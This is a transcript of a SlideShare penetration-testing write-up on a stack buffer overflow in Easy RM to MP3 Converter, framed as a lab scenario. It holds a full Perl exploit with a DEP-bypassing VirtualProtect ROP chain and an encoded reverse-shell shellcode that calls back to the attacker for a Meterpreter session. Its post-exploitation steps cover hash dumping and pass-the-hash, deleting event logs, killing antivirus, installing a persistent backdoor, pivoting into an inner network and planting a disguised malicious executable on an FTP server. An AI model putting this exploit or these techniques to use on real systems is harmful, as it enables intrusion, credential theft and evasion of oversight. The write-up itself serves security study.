Your SlideShare is downloading. ×
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

1,139
views

Published on

This is my first arti

This is my first arti


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,139
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Penetration Testing for Easy RM to MP3 Converter Application & Post Exploit Author: JongWon Kim dikien2012@gmail.com http://dikien2012.blogspot.com1
  • 2. Table of Contents Penetration Testing for Easy RM to MP3 Converter Application.............................................................1 Table of Contents……….........................................................................................................................2 Abstract..................................................................................................................................................3 Setting up the Testing Enviroment.........................................................................................................4 Strategy for the Application Testing........................................................................................................5 Dynamic Analysis...................................................................................................................................6 Strategy for the Post Exploit.................................................................................................................15 Post Exploit...........................................................................................................................................16 Conclusion............................................................................................................................................21 http://dikien2012.blogspot.com2
  • 3. Abstract Advanced Persistent Attack nowadays has threatened our valuable assets. Many exploits that threaten end point users and corporation have been researched day by day. No matter how operation system protection methods works well, privilege escalation could be easy just because a vulnerable application. Many corporations defends their information by setting firewall, WAF, and SLB, but only one vulnerable application could make these powerful protection line incapacitated. In this paper, I will analysis this application and suggest the solution within windows environment. This is imaginary scenario for this paper. My client requests me sometimes „Easy RM to MP3 Converter ‟exits when opening a m3u file that contains an overly long strings. First, I figure out this application has a vulnerability with stack based buffer overflow. I build the ROP based exploit to test. Second, I will attack the machine running the application with the exploitation and do post exploit. http://dikien2012.blogspot.com3
  • 4. Setting up the Testing Environment  Backtrack5 R1(Attack Machine, 192.168.10.10)  Windows SP2 (First Victim for the application penetration testing, 192.168.10.5, 10.10.10.5)  Windows SP3(Second Victim for pivot, 10.10.10.20)  Immunity Debugger 1.83  Easy RM to MP3 Converter(2.7.3.700, Vulnerable Application)  Metasploit Framework  Social Engineering Toolkit  ALFTP 5.22 Testing Environment Explanation : The default DEP, Data Execute Protection, setting for Windows SP2 is OptIn(All programs, process, services on the windows system are protected, except for processes in the exception list). Before taking a penetration testing, I manually have changed it to OptOut by adding „/noexecute=policy‟ to the end of the line that refers to the OS boot configuration. OptOut option is that all programs, processes, services on the Windows system are protected, except for processes in the exception list. There is no the exception list for this testing. http://dikien2012.blogspot.com4
  • 5. Strategy for the Application Testing I use one of the windows function calls named VirtualProtect() to bypass DEP. This function change the access protection level of a given memory page, allowing to make the location where my payload resides executable. I have to set up the stack with the correct parameters for that function first. I can‟t overwrite return address directly to my payload or use SEH chains because the payload will not get executed on stack since DEP is OptOut. Below is the prototype of VirtualProtect() : BOOL WINAPI VirtualProtect( __in LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flNewProtect, __out PDWORD lpflOldProtect );  Return address: VirtualProtect () will return to the pointer to the location where the address of the payload on the stack  lpAddress: A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.  dwSize: The size of the region whose access protection attributes are to be changed, in bytes.  flNewProtect: Option that specifies the new protection 0x00000040 PAGE_EXECUTE_READWRITE  lpflOldProtect : Pointer to variable that will receive the previous access protection value. http://dikien2012.blogspot.com5
  • 6. Dynamic Analysis At first, I calculate the offset between registers and the buffer with the perl script to make a vulnerable m3u file and run the application attached debugger with the m3u file. Below is source code to make an m3u file. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26058; $junk = $junk . "XXXX"; my $eip = "BBBB"; # This will overwrite the EIP. my $nops = "x90"x240; my $shellcode =””; my $rest = "C"x300; my $payload = $junk.$eip.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== [ Figure 1. EIP is overwritten with BBBB ] http://dikien2012.blogspot.com6
  • 7. 42424242 is hexadecimal representation for BBBB. There is another method to find offset with mona.py by command line below debugger „!mona pattern_create 3000‟. I add this unique pattern to the script. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26000; my $pattern =””; # msf unique pattern is here my $nops = "x90"x240; my $shellcode = ""; my $rest = "C"x300; my $payload = $junk.$pattern.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== After crashing, I get more useful information by command „!mona suggest‟. On top of that, I check if the payload is corrupt or not by command „!mona compare -f “C:Documents and SettingsAdministrator바탕 화면RM2MP3Converterpattern.txt‟. I create gatgets to make a ROP chains by command „!mona rop -n -cm aslr=false,safeseh=false,rebase=false‟. After making the ROP chains, EIP will point the shellcode that I want to get executed. I made the shellcode with msfpayload and msfencode and added the script to make a final exploit m3u file. [ Figure 2. Making a Payload to connect back to attacker machine ] My final exploit is below. Stage-1 : Saving stack pointer to EAX and EDI registers and jumping over the parameters Stage-2 : Crafting parameters lead to setting up the arguments of a function that would allow me to disable DEP or bypass it. http://dikien2012.blogspot.com7
  • 8. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26064; my $eip = pack(V,0x7C84483D); # RETN from kernel32.dll my $junk2 = "AAAA"; # Compensate for ########### Stage-1 Started here ########### ########### Put stack pointer in EDI & EAX ########### my $rop = pack(V,0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll $rop = $rop.pack(V,0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll $rop = $rop."AAAA"; # Compensate for $rop = $rop.pack(V,0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll ########### Parameters fpr VirtualProtect() ########### my $parameters =pack(V,0x7C801AD0); # Address for VirtualProtect () $parameters = $parameters."WWWW"; # Return address $parameters = $parameters."XXXX"; # lpaddress $parameters = $parameters."YYYY"; # Size $parameters = $parameters."ZZZZ"; # flNewProtect $parameters = $parameters.pack(V,0x10035005); # Writeable address $parameters = $parameters.("H" x 8); # Padding ########### Stage-1 finished ########### ########### Stage-2 starts is below ########### ########### First Parameter ############ my $rop2 = pack(V,0x77427175); # XCHG EDI,ESI//RETN 8 http://dikien2012.blogspot.com8
  • 9. ########### Make EAX point at the shellcode ########### $rop2 = $rop2.pack(V,0x1002DC4C); # ADD EAX,100//POP EBP from MSRMfilter03.dll $rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8 $rop2 = $rop2."AAAA"; $rop2 = $rop2."AAAA"; ########### Second Parameter, RETN is in EAX ############ $rop2 = $rop2.pack(V,0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN $rop2 = $rop2."AAAA"; #Padding ########## EAX now contains Stack Pointer ############# $rop2 = $rop2.pack(V,0x76A602BC); # PUSH EAX//POP ESI//RETN ########## Make EAX point at Shellcode again ########### $rop2 = $rop2.pack(V,0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; #Padding ########## Increase ESI with 4 ############# $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack(V,0x5C83F948); $rop2 = $rop2.pack(V,0x5C83F948); $rop2 = $rop2.pack(V,0x5C83F948); ########## Write lpADDress ############ $rop2 = $rop2.pack(V,0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding http://dikien2012.blogspot.com9
  • 10. ########## Save EAX in ESI again ########## $rop2 = $rop2.pack(V,0x76A602BC); # PUSH EAX POP ESI RETN ########## Create Size Set EAX to 300 or so ########## $rop2 = $rop2.pack(V,0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack(V,0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack(V,0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack(V,0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding ########## Write Size, First Set ESI to Right Place ########## $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack(V,0x5C83F948); $rop2 = $rop2.pack(V,0x5C83F948); $rop2 = $rop2.pack(V,0x5C83F948); ########## 3th Parameter ########## $rop2 = $rop2.pack(V,0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding ########## Save EAX in ESI again ########## $rop2 = $rop2.pack(V,0x76A602BC); # PUSH EAX//POP ESI//RETN ########## flNewProject 0x40 ########## $rop2 = $rop2.pack(V,0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack(V,0x1002DC41); # ADD EAX,40//POP EBP//RETN http://dikien2012.blogspot.com10
  • 11. $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack(V,0x5C83F948); # INC ESI//RETN from comctl32 ########## 4th Parameter ########## $rop2 = $rop2.pack(V,0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN $rop2 = $rop2."AAAA"; # Padding ########## Return to virtual protect pointer, Compensate for 2 POPs instruction ########## $rop2 = $rop2.pack(V,0x76A6028F); # SUB EAX,4//ret $rop2 = $rop2.pack(V,0x76A6028F); # SUB EAX,4//ret ########## Change ESP & Back to the origin ########## $rop2 = $rop2.pack(V,0x73D35CA8); # PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll my $nops = "x90"x240; $shellcode = "x89xe0xd9xf6xd9x70xf4x5ax4ax4ax4ax4ax4ax4a" . "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" . "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" . "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" . "x75x4ax49x49x6cx49x78x6bx39x43x30x75x50x53" . "x30x73x50x4ex69x4dx35x44x71x6ex32x62x44x6c" . "x4bx62x72x30x30x4cx4bx46x32x56x6cx6ex6bx30" . "x52x75x44x6ex6bx61x62x56x48x74x4fx4dx67x42" . "x6ax65x76x30x31x49x6fx66x51x79x50x6cx6cx75" . http://dikien2012.blogspot.com11
  • 12. "x6cx45x31x53x4cx35x52x56x4cx71x30x59x51x48" . "x4fx54x4dx37x71x7ax67x6dx32x5ax50x76x32x66" . "x37x4ex6bx56x32x44x50x6ex6bx37x32x37x4cx55" . "x51x5ax70x4cx4bx63x70x30x78x6fx75x39x50x32" . "x54x62x6ax47x71x48x50x30x50x6ex6bx73x78x55" . "x48x4ex6bx46x38x57x50x55x51x6ex33x59x73x47" . "x4cx42x69x4ex6bx75x64x4cx4bx33x31x4bx66x55" . "x61x4bx4fx55x61x79x50x4ex4cx59x51x7ax6fx54" . "x4dx55x51x6ax67x66x58x49x70x30x75x58x74x65" . "x53x31x6dx5ax58x37x4bx63x4dx46x44x73x45x39" . "x72x31x48x4ex6bx76x38x77x54x65x51x59x43x42" . "x46x4ex6bx56x6cx50x4bx4ex6bx31x48x45x4cx43" . "x31x79x43x6cx4bx45x54x4ex6bx77x71x4ex30x4c" . "x49x43x74x54x64x65x74x61x4bx71x4bx73x51x70" . "x59x52x7ax66x31x69x6fx49x70x62x78x33x6fx61" . "x4ax6cx4bx45x42x4ax4bx4bx36x61x4dx71x78x76" . "x53x54x72x45x50x57x70x75x38x52x57x33x43x66" . "x52x73x6fx63x64x42x48x30x4cx52x57x66x46x57" . "x77x4bx4fx78x55x4cx78x4ex70x65x51x75x50x67" . "x70x71x39x38x44x71x44x70x50x70x68x51x39x6b" . "x30x50x6bx77x70x59x6fx38x55x42x70x52x70x46" . "x30x62x70x67x30x66x30x61x50x70x50x42x48x7a" . "x4ax44x4fx79x4fx39x70x4bx4fx58x55x4ax37x43" . "x5ax67x75x65x38x69x50x4dx78x35x5ax37x7ax35" . "x38x35x52x33x30x56x71x51x4cx4dx59x38x66x51" . "x7ax54x50x62x76x66x37x35x38x4ex79x49x35x74" . "x34x71x71x69x6fx6ax75x4fx75x6bx70x42x54x56" . "x6cx49x6fx62x6ex74x48x63x45x7ax4cx32x48x6c" . "x30x6fx45x4ex42x63x66x49x6fx68x55x61x7ax47" . http://dikien2012.blogspot.com12
  • 13. "x70x61x7ax34x44x50x56x36x37x75x38x63x32x4b" . "x69x69x58x73x6fx49x6fx39x45x4ex6bx57x46x31" . "x7ax47x30x33x58x55x50x44x50x47x70x73x30x32" . "x76x62x4ax65x50x32x48x66x38x69x34x61x43x59" . "x75x69x6fx68x55x5ax33x56x33x61x7ax55x50x61" . "x46x32x73x50x57x30x68x66x62x68x59x48x48x53" . "x6fx6bx4fx39x45x47x71x48x43x57x59x58x46x4e" . "x65x4cx36x30x75x68x6cx6fx33x41x41"; my $rest = "C"x300; my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== Since the shellcode is turning back to the backtrack machine, I use multi handler on msfconosole to listen on 4444 tcp port. [ Figure 3. Listening on 4444 tcp port ] http://dikien2012.blogspot.com13
  • 14. I create the m3u file with above script and open it with the application. [ Figure 4. Open the exploit.m3u to crach the application ] I get the meterpreter shell from first victim machine.. [ Figure 5. Get the Meterpreter shell from the first Victim Machine ] http://dikien2012.blogspot.com14
  • 15. Strategy for the Post Exploit 1. Understanding the Victim better 2. Privilege Escalation 3. Deleting Logs and Killing Monitoring software 4. Collecting Data, and Executing programs 5. Backdoors and Rootkits 6. Using victims as a Pivot to hack deeper into the network http://dikien2012.blogspot.com15
  • 16. Post Exploit 1. Understaning the Victim better [ Figure 5. Network Information ] I figure out password hashes and can crack it with JohnTheRipper. If I cannot figure out what the original passwords, I can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. [ Figure 6. Password Hashes ] I can look for more vulnerable applications, available tokens, and routing table. [ Figure 7. Token Lists ] http://dikien2012.blogspot.com16
  • 17. [ Figure 8. Running applications ] [ Figure 9. Routing Table ] I notice this machine is running on ALFTP, it will be used on social engineering attack. [ Figure 10. ALFTP is running ] 2. Privilege Escalation After getting the system, I safely migrate 1072(svchost.exe) via technique 1. [ Figure 11. Privilege Escalation Success ] http://dikien2012.blogspot.com17
  • 18. 3. Deleting Logs and Killing Monitoring software I try to kill anti virus software, but there is no it and get rid of event logs. [ Figure 12. Killing AV and deleting event logs ] 4. Collecting Data, and Executing programs [ Figure 13. Collecting txt files ] 5. Backdoors and Rootkits I run persistence and tell Windows to auto start the agent at boot time, wait 100 seconds before connection retries to run on port 443 and connect to IP 192.168.10.5. [ Figure 14. Installing the Backdoor ] http://dikien2012.blogspot.com18
  • 19. 6. Using victims as a Pivot to hack deeper into the network I found the first victim machine has two network cards of different subnets, which will be inner network disconnected from outside. I go inside using first victim machine working tunnel. [ Figure 15. Setting routing table ] [ Figure 16. Running scan via session 1 ] I am aware the second victim machine (10.10.10.20) has open port for 139, which means it could have vulnerability for „MS08-067‟. [ Figure 17. Port Scan ] I make a malicious file with fake name (alsong.exe) that works for connecting back to attacker machine with meterpreter shell. I find the working directory for FTP Server on first victim machine and upload it. [ Figure 18. Uploading the malicious file ] http://dikien2012.blogspot.com19
  • 20. Check it out malicious file is on the FTP Server. Second victim download and execute it. [ Figure 19. Uploading the malicious file ] New session is created by second victim machine. [ Figure 20. Attak Success on second Victim machine ] http://dikien2012.blogspot.com20
  • 21. Conclusion I showed vulnerable application could threaten the inner intranet. It is not always latest OS protection mechanism, Firewall, and SLB can protect our assets. It is vital that not only developers should ensure their secure coding from preventing from such as buffer over flow or heap spray attack, but also end point users should be aware security consciousness whose they don‟t have to use applications they don‟t use for work and always updated to the latest condition. It is obvious that essential database should be away from normal staffs completely. As is frequently pointed out, we should keep in mind attack could happen inside. http://dikien2012.blogspot.com21